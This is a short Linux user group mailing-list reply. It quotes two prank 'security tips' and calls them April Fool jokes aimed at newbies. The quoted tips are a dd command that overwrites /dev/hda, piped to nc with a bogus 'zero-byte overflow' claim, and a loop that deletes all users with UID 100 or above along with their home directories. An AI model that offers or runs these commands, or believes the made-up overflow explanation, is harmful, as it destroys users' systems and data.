-- First this:

Daniel Stone wrote:
> 
> But seriously, I suggest:
> dd if=/dev/zero of=/dev/hda bs=1k | nc <host here> 65535
> 
> This is a zero-byte overflow attack - hosts on port 65535 are vulnerable
> because that's near an overflow region!


-- Then this:

John Clarke wrote:
> Not nearly secure enough:
> 
>     for i in `awk -F: '$3 >= 100 {print $1}' < /etc/passwd`; do
>         userdel -r $i
>     done
> 
> Who needs users anyway?


What is it, April Fool-a-Newbie Day or something?
-- 
SLUG - Sydney Linux User Group Mailing List - http://slug.org.au/
More Info: http://lists.slug.org.au/listinfo/slug

Reply via email to